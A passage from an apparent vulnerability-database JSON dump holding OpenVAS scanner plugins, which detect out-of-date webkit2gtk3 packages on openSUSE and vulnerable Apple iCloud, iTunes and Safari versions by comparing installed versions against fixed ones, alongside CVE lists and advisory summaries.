rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:26", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT209346)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814603", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT209346)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814603\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4437\", \"CVE-2018-4464\",\n \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 11:23:39 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple iCloud Security Updates(HT209346)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks and run arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.9 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.9 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209346\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.9\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.9\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:01", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates(HT209345)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814602", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814602", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates(HT209345)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814602\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4437\", \"CVE-2018-4464\",\n \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 11:14:55 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple iTunes Security Updates(HT209345)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks and run arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209345\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nappVer = infos['version'];\nappPath = infos['location'];\n\nif(version_is_less(version:appVer, test_version:\"12.9.2\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"12.9.2\", install_path: appPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:48:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-03-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0308-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2019-6217", "CVE-2018-4443", "CVE-2019-6233", "CVE-2018-4438", "CVE-2019-6229", "CVE-2018-4464", "CVE-2019-6227", "CVE-2019-6226", "CVE-2018-4441", "CVE-2019-6234", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6212"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852338", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852338\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\",\n \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\",\n \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\",\n \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-03-09 04:08:40 +0100 (Sat, 09 Mar 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0308-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0308-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-03/msg00014.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0308-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.6 fixes the following issues\n (boo#1124937 boo#1119558):\n\n Security vulnerabilities fixed:\n\n - CVE-2018-4437: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web content may lead to\n arbitrary code execution. A logic issue existed resulting in memory\n corruption. This was addressed with improved state management.\n (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web content may lead to\n arbitrary code execution. A type confusion issue was addressed with\n improved memory handling.\n\n - CVE-2019-6216: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling.\n\n - CVE-2019-6229: Processing maliciously crafted web content may lead to\n universal cross site scripting. A logic issue was addressed with\n improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates(HT209344)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814601", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT209344)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814601\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4445\", \"CVE-2018-4437\",\n \"CVE-2018-4464\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\",\n \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 10:43:13 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple Safari Security Updates(HT209344)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - 'Clear History and Website Data' did not clear the history.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks, arbitrary code execution and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 12.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 12.0.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209344\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\", \"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif((!osName && \"Mac OS X\" >!< osName) || !osVer){\n exit (0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.12.6 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.13.6 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(osVer == \"10.14\")\n{\n fix = \"Upgrade Apple Mac OS X to version 10.14.1 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\n\nelse\n{\n if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\n safVer = infos['version'];\n safPath = infos['location'];\n\n if(version_is_less(version:safVer, test_version:\"12.0.2\"))\n {\n fix = \"12.0.2\";\n installedVer = \"Apple Safari \" + safVer ;\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:installedVer, fixed_version:fix, install_path:safPath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:48:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-03-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0309-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6217", "CVE-2019-6233", "CVE-2019-6229", "CVE-2019-6227", "CVE-2019-6226", "CVE-2019-6234", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6212"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852337", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852337", "sourceData": "# Copyright 